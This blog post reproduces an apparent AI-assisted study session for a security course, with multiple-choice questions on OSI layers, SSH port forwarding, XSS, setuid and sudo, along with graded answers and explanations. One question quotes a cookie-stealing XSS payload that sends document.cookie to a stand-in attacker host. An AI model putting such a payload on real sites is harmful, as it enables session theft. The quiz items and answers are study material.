5618选择题复习4
本文最后由方少年更新于2025 年 11 月 26 日,已超过5天没有更新。如果文章内容或图片资源失效,请留言反馈,将会及时处理,谢谢!
好的!按你的最新要求,我不会在输出中透露任何答案或答案分布。下面是全新 15 道英文选择题(每题只有一个正确选项),难度与知识点参考了你提供的 sample exam。请在每题后的【】中填写你的作答字母(A/B/C/D),提交后我会批改并给出解析。
- In a file transfer, the recipient sees garbled characters due to a character encoding mismatch. At which OSI layer should troubleshooting begin?
a) Network
b) Transport
c) Data Link
d) Presentation
【D】 - Which statement best defines the legal boundary for performing security testing on a target system?
a) It is acceptable if no data is damaged
b) It requires explicit authorization from the owner or authority
c) It is acceptable if intended for research
d) It is acceptable if commonly practiced in the industry
【B】 - You have one public IP but must publish two different internal services by mapping different public ports to different internal hosts. Which solution should you use?
a) Port Address Translation (PAT)
b) DHCP relay
c) Static routing
d) DNS round-robin
【A】 - Which statement correctly distinguishes a SOCKS proxy from a traditional web proxy?
a) SOCKS operates at a lower OSI layer than web proxies
b) SOCKS is limited to HTTP/HTTPS only
c) Web proxies primarily support arbitrary TCP protocols
d) Web proxies are optimized for HTTP(S), while SOCKS can proxy a wider range of protocols (e.g., FTP, SMTP)
【D】 - You can SSH into a bastion host but an internal web app is not exposed externally. Which technique creates a direct tunnel from a local port to the app’s host:port without changing browser proxy settings?
a) SSH local port forwarding
b) SSH reverse port forwarding
c) VPN tunneling of all traffic
d) SSH dynamic port forwarding (SOCKS)
【D】 - A comment feature reflects the following payload to other users’ browsers:
<script>document.location='https://attacker.tld/steal?c='+document.cookie</script>Which vulnerability is being exploited?
a) SQL Injection
b) Cross-Site Request Forgery (CSRF)
c) Cross-Site Scripting (XSS)
d) Remote Code Execution
【C】
- A team wants to find security flaws by analyzing source code before compilation or runtime. Which method fits best?
a) Dynamic Application Security Testing (DAST)
b) Static Application Security Testing (SAST)
c) Fuzz testing
d) Penetration testing
【B】 - A tester submits large volumes of random or malformed inputs to trigger crashes and unexpected behavior. Which technique is being used?
a) Regression testing
b) Unit testing
c) Fuzz testing
d) Static analysis
【C】 - Which statement about signature-based malware detection is most accurate?
a) It is primarily behavior-based and excels at unknown threats
b) It cannot detect any known malware reliably
c) It requires no frequent updates to remain effective
d) It detects known malware effectively but is weak against zero-day variants lacking signatures
【D】 - Which tool is primarily used to quickly enumerate web directories and files by brute-forcing paths?
a) Hydra
b) Gobuster
c) Metasploit
d) Netcat
【B】 - Which scenario best represents horizontal privilege escalation?
a) One regular user gains access to another regular user’s account or data
b) A standard user becomes an administrator on the same system
c) An administrator grants themselves additional system-wide permissions
d) A standard user modifies system files and becomes root
【A】 - A root-owned binary, when executed by a normal user, runs with an effective UID of root and performs privileged actions. Which mechanism is most likely responsible?
a) Misconfigured cron job
b) Misconfigured sudoers file
c) Setuid bit
d) Setgid bit
【不知道】 - What is the primary purpose of AndroidManifest.xml in an Android application?
a) To define the app’s UI layouts and views
b) To provide essential metadata to the system and declare required permissions
c) To store the app’s images and graphical assets
d) To define the app’s internal database schema
【B】 - What is the main purpose of a chain of custody protocol in digital forensics?
a) To ensure evidence is properly handled and documented to prevent tampering
b) To manage user access control policies for endpoints
c) To store and rotate encryption keys for sensitive data
d) To automate malware triage during incident response
【A】 - You need a flexible way to access multiple internal services through a single SSH connection by configuring your browser to use a local SOCKS proxy. Which technique should you use?
a) SSH local port forwarding
b) SSH reverse port forwarding
c) VPN split tunneling
d) SSH dynamic port forwarding
【D】
批改结果:13 / 15
逐题判定与解析(不透露选项字母):
- 正确
要点:字符编码/加解密/压缩等数据表示问题归属于表示层。 - 正确
要点:进行安全测试的合法边界是“明确授权”,意图或行业习惯不构成合法性。 - 正确
要点:单一公网 IP 上按端口映射到不同内网主机/服务,使用端口地址转换/端口转发思路。 - 正确
要点:Web 代理主要面向 HTTP(S) 场景;SOCKS 是通用代理,可转发更多协议(如 FTP、SMTP)。 - 错误
要点:题干强调“直连到目标 host:port 且无需改浏览器代理设置”,应使用“本地端口转发”。动态转发(SOCKS)需要将浏览器/应用指向本地 SOCKS 代理。
提示区分:
- 本地转发:把本机某端口映射到内网目标 host:port,适合单个服务直连。
- 动态转发:在本机起 SOCKS 代理,通过浏览器/工具配置代理后访问多目标/多端口。
- 反向转发:让远端能连回你本地端口,常用于穿透到本地服务。
- 正确
要点:将脚本注入并在他人浏览器执行、窃取 Cookie,是反射/存储型跨站脚本(XSS)典型表现。 - 正确
要点:在编译/运行前通过静态规则、数据/控制流分析源代码查找缺陷,属于静态应用安全测试。 - 正确
要点:向目标大量投喂随机/畸形输入触发崩溃或异常,属于模糊测试。 - 正确
要点:基于签名的方法对“已知”恶意样本效果好,但对零日/变种(无签名)较弱,需频繁更新。 - 正确
要点:目录/文件枚举常用路径爆破工具用于发现隐藏资源。 - 正确
要点:水平越权是同级别账户之间的未授权访问(用户 A 访问用户 B 的数据),区别于纵向越权(普通→管理员/root)。 - 未作答(计为错误)
要点:题干描述为“普通用户执行 root 拥有的二进制时进程的‘有效 UID’变为 root 并获得特权”,这是典型的 setuid 机制。
补充区分:
- sudoers:仅在通过 sudo 调用时生效;题干未使用 sudo。
- setgid:改变有效“组”身份,非获得 root 用户身份。
- cron:定时任务,不等同于执行即提权。
- 正确
要点:AndroidManifest.xml 用于声明应用组件、权限与元数据,供系统识别与调度。 - 正确
要点:证据保全链确保采集—传递—存储—分析全流程的可审计与防篡改。 - 正确
要点:通过单一 SSH 连接在本地启动 SOCKS 代理,再将浏览器指向该代理,从而访问多内网服务,属于动态转发场景。
针对错题的快速巩固:
端口转发家族:
- 本地转发=直连单个目标服务,无需改代理设置。
- 动态转发=建立 SOCKS 代理,适合多目标/多端口,但需在客户端配置代理。
- 反向转发=让远端主机能连回你的本地端口。
- setuid 提权原理:二进制带有 setuid 位且属主为 root,则进程的有效 UID 置为 root;是常见提权点,需最小化使用、优先用 Linux capabilities 替代,并对环境变量/PATH 进行净化。
如果你愿意,我可以就“本地/动态/反向转发”和“setuid vs sudoers/setgid”各出 2 道变体练习,继续检验与加深记忆。
好的!按你的复习目标,我分别就两块主题各给出变体练习题。遵循你之前的要求:每题只有一个正确答案;英文题面;本轮不提供答案,你作答后我再批改与解析;每题末尾加【】方便填写。
主题一:SSH 本地/动态/反向转发变体练习(共 6 题)
- You need one-off access from your laptop to an internal database at 10.0.2.15:5432 via a bastion (bastion.example.com). You don’t want to change any client proxy settings. Which SSH technique best fits?
a) Local port forwarding
b) Dynamic port forwarding
c) Reverse port forwarding
d) VPN full tunneling
【A】 - You want your remote teammate (on a server you SSH into) to reach a web tool running on your laptop at http://127.0.0.1:8080. Which technique exposes your local service to the remote host through the SSH connection?
a) Local port forwarding
b) Dynamic port forwarding (SOCKS)
c) Reverse port forwarding
d) SSH jump proxy
【C】 - Your browser must access many internal systems (HTTP, SSH over proxy-aware client, custom TCP) through a single SSH connection to a bastion, and you are fine configuring the browser to use a local proxy. Which approach is most appropriate?
a) Local port forwarding to each target
b) Dynamic port forwarding to create a local SOCKS proxy
c) Reverse port forwarding back to the bastion
d) Static routing entries on your laptop
【B】 - A CI runner inside a private VPC must pull artifacts from your machine during build. You can SSH into the runner, but inbound to your laptop is blocked by NAT/firewall. Which method lets the runner connect back to a port on your laptop through the SSH tunnel you initiated?
a) Local port forwarding
b) Reverse port forwarding
c) Dynamic port forwarding
d) Split-tunnel VPN
【B】 - You created an SSH tunnel using dynamic port forwarding on port 1080 locally. Your browser cannot reach internal sites until you modify its network settings. Why?
a) Dynamic forwarding requires the browser to be configured to use the local SOCKS proxy
b) The tunnel only supports UDP
c) The tunnel changes system routing tables automatically
d) SSH always sets up HTTP CONNECT proxies, not SOCKS
【B】 - Which statement best differentiates local vs reverse port forwarding?
a) Local forwarding maps a local port to a remote target; reverse forwarding maps a remote port to a local target
b) Local forwarding always requires proxy settings; reverse forwarding never does
c) Local forwarding only supports UDP; reverse forwarding only supports TCP
d) Local forwarding is less secure than reverse forwarding
【A】
主题二:setuid vs sudoers vs setgid 变体练习(共 6 题)
- A normal user executes /usr/local/bin/backup owned by root. The process can read /etc/shadow even though the user cannot. No sudo was used. Which mechanism most likely enables this?
a) Misconfigured cron job
b) setuid on the binary
c) sudoers NOPASSWD entry
d) setgid on the binary
【B】 - Which statement accurately compares setuid and sudo?
a) setuid changes the real UID; sudo changes only the group
b) setuid can elevate effective UID when executing the binary; sudo consults policy to run a command as another user
c) setuid requires a password prompt; sudo never requires a password
d) setuid only works on scripts; sudo only works on binaries
【AB不确定】 - A binary is group-owned by “dbadmin” with the setgid bit set. What is the typical effect when a regular user runs it?
a) The process’s effective UID becomes root
b) The process’s effective GID becomes dbadmin
c) The process’s real GID becomes 0
d) The user gains sudo privileges
【B】 - Which is a safer modern alternative to avoid granting full root via setuid for networking utilities (e.g., ping)?
a) Running everything with sudo
b) Using Linux capabilities to grant only needed privileges
c) Setting setgid on all binaries
d) Mounting all filesystems with nosuid
【B】 - Why is relying on setuid root binaries risky from a security standpoint?
a) They can only be executed by root
b) They ignore environment variables entirely
c) Any memory-safety or environment-handling bug can lead to privilege escalation
d) They cannot open files
【A】 - Which control in sudoers reduces attack surface compared to blanket sudo?
a) Allowing ALL commands for ALL users
b) Requiring NOPASSWD for convenience
c) Command whitelisting with least privilege and logging
d) Disabling TTY requirement
【C】
批改结果:9 / 12
判定与解析(不透露标准选项字母,仅给结论与知识点):
主题一:SSH 本地/动态/反向转发(Q1–Q6)
- 正确
要点:无需改代理设置、直连某一内网目标服务=本地端口转发更合适。示例:
ssh -L 15432:10.0.2.15:5432 user@bastion.example.com
# 本地连 127.0.0.1:15432 即相当于直连 10.0.2.15:5432- 正确
要点:让远端主机访问你本地的 127.0.0.1:8080,需要“让远端端口映射到本地”=反向端口转发。示例:
ssh -R 9000:127.0.0.1:8080 user@remote
# 远端访问 127.0.0.1:9000 -> 你本地 127.0.0.1:8080- 正确
要点:要通过浏览器访问多个内网系统,且愿意配置浏览器代理=动态端口转发(本地 SOCKS 代理)。示例:
ssh -D 1080 user@bastion
# 浏览器配置 SOCKS5 代理 127.0.0.1:1080- 正确
要点:你能主动 SSH 进 CI runner,但对方无法主动连回你的笔记本,这种“让远端连回本地”的场景=反向端口转发。 - 错误
要点:动态转发启动的是本地 SOCKS 代理;浏览器不改代理设置不会自动走 SOCKS,需要手动配置网络代理。并非“只支持 UDP”。说明:
- 动态转发默认用于 TCP;SOCKS5 协议支持 UDP Associate,但浏览器访问网页主要是 TCP。
- 正确姿势:在浏览器里设定 SOCKS5 127.0.0.1:1080,或用系统代理/Proxy Auto-Config。
ssh -D 1080 user@bastion
# 然后在浏览器网络设置中选择 SOCKS5 代理 127.0.0.1:1080- 正确
要点:本地转发=“本地端口 -> 远端目标”;反向转发=“远端端口 -> 本地目标”。
主题二:setuid vs sudoers vs setgid(Q7–Q12)
7) 正确
要点:未使用 sudo 却能读取 /etc/shadow,典型是二进制具备 setuid(属主为 root),进程的“有效 UID”切换为 root。
- 回答不规范(多选),计为错误
要点:唯一正确的表述应当同时体现两点:
- setuid:在执行该二进制时可将进程“有效 UID”提升为文件属主(常见为 root)。
- sudo:依据 sudoers 策略,以另一个用户身份执行命令(可要求口令、可审计/记录)。
其他干扰项为何不对: - “改变 real UID/只改变组”这类说法不准确或偷换概念;
- “setuid 需要口令/只作用于脚本”均错误(多数内核默认禁止脚本 setuid 生效,且 setuid 执行不要求输入口令)。
- 正确
要点:setgid 侧重“组身份”,运行时进程的“有效 GID”变为该二进制的组(例:dbadmin),便于访问受组权限保护的资源。 - 正确
要点:Linux capabilities 细粒度赋权(如仅授 cap_net_raw 给 ping),替代“整机 root”的粗放 setuid,更安全可控。示例:
sudo setcap cap_net_raw+ep /bin/ping
getcap /bin/ping- 错误
要点:setuid root 程序的风险在于“任何内存安全/环境处理缺陷都有可能被利用为提权”。并非“只能被 root 执行”(恰恰是普通用户可执行才有风险)。补充:
- 风险面:缓冲区溢出、PATH/HOME/LD_PRELOAD 等环境变量处理不当、不安全的临时文件等。
- 缓解:最小化 setuid、优先用 capabilities、特权分离/执行后及时降权、挂载 nosuid、严格净化环境变量。
- 正确
要点:sudoers 应用“最小权限+命令白名单+审计日志”能有效缩小攻击面;相反,给 ALL 或 NOPASSWD 滥权会放大风险。
小结速记
本地/动态/反向:
- 本地:我去连内网单一目标;客户端不用改代理。
- 动态:我在本地开 SOCKS 代理;客户端需要配置代理,可访问多目标。
- 反向:让远端通过我建立的隧道来连回我的本地端口。
setuid/sudo/setgid:
- setuid:执行时提升“有效 UID”到文件属主,多为 root。
- sudo:按策略以他人身份执行命令,可记录、可要求口令。
- setgid:改变“有效 GID”,用于组权限访问,并非用户身份提权。
要不要我把第 5、8、11 三题再换个场景出几道“同坑易错点”强化题,让你立刻复盘?
~ ~ The End ~ ~
文章标题:5618选择题复习4
文章链接:https://www.fangshaonian.cn/archives/147/
最后编辑:2025 年 11 月 26 日 02:58 By 方少年
许可协议: 署名-非商业性使用-相同方式共享 4.0 国际 (CC BY-NC-SA 4.0)